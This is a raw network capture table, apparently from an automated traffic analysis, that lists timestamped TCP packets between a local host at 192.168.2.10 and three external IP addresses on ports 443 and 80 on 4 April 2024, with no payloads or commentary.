Apr 4, 2024 17:49:03.026468992 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.028050900 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.046991110 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.092237949 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.506519079 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.506551981 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.506622076 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.522659063 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.522671938 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.550575972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:03.640202045 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.640276909 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.640286922 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.640324116 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.640330076 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.640345097 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.640367985 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.640388966 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.640670061 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.640685081 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.713778019 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:03.784054995 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.784123898 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.789124966 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.789136887 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.789750099 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.789797068 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.797410011 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.840236902 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.872910976 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:03.872991085 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:03.873203993 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:03.913732052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:03.913825035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:03.914000034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.083936930 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.278023958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286798954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286815882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286829948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286869049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.286926985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286941051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286953926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286967039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.286993980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.287007093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.287062883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.287076950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.287121058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.287182093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.287235022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.287252903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.400574923 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:04.400718927 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:04.400861979 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:04.401084900 CEST	49729	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:04.401107073 CEST	443	49729	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:04.602121115 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.602143049 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.602155924 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.602169991 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.602204084 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.602232933 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.649857044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.649876118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.649921894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.649936914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.649950981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.649993896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.649998903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650032997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650047064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650079012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650088072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650120974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650134087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650199890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650213957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650254965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650266886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650279999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650285006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650295973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650300026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650319099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650321960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650363922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650371075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650408030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650422096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.650461912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.650466919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:04.651992083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:04.761926889 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.761990070 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762011051 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.762044907 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.762105942 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762166977 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.762192965 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762236118 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.762375116 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762414932 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.762435913 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762487888 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.762531042 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.884697914 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.884768009 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.921547890 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.921601057 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.921674967 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.921713114 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.921755075 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.921897888 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.921961069 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.921983004 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922024012 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922046900 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922055960 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922085047 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922096968 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922121048 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922138929 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922178984 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922194958 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922209024 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922221899 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922233105 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922240019 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:04.922270060 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:04.922301054 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.013025045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013060093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013109922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013112068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013128042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013142109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013184071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013189077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013204098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013217926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013245106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013257980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013282061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013295889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013339043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013355017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013367891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013381004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013392925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013405085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013422966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013437033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013448000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013465881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013513088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013523102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013535023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013561964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013576984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013636112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013648987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013664007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013674021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013705969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013719082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013756990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013773918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013787031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013825893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013829947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013834953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013883114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013909101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013921976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013933897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013961077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.013983011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.013994932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.014000893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014022112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.014024019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014039040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014043093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014065981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014084101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.014095068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014177084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.014846087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014859915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.014903069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.044109106 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.044271946 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.044322968 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.044368029 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.081101894 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.081361055 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.081470013 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.169118881 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.169200897 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.169329882 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.169353962 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.169388056 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.169399977 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.169430971 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.169437885 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.169475079 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171144009 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171212912 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171281099 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171294928 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171325922 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171353102 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171416044 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171485901 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171498060 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171541929 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171598911 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171650887 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171737909 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171787977 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171793938 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171838999 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171865940 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171878099 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171895981 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171906948 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171915054 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171936989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171966076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.171988010 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.171999931 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172039032 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172045946 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172058105 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172085047 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172106028 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172106981 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172117949 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172128916 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172152042 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172164917 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172168016 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172194004 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172194958 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172229052 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172238111 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172255039 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172266960 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172297001 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172316074 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172317028 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172327042 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172363997 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172389984 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172430038 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172432899 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172441959 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172468901 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172486067 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.172489882 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.172727108 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.203778028 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.203855038 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.203869104 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.203984022 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.204107046 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.204344034 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.240802050 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.240818024 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.240834951 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.240919113 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.240946054 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.328764915 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.328874111 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.328880072 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.328912020 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329072952 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329123020 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329161882 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329219103 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329257011 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329371929 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329411030 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329504967 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329523087 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329547882 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329557896 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329864025 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329885006 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.329900026 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.329920053 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.376260996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376281023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376326084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376336098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376384974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376441956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376477003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376481056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376518011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376544952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376558065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376591921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376629114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376642942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376676083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376681089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376689911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376703978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376728058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376753092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376771927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376806974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376813889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376821995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376836061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376840115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376869917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376869917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376883984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376920938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.376950979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.376974106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377007961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377043962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377077103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377130032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377136946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377161980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377234936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377273083 CEST	49730	80	192.168.2.10	103.23.232.80
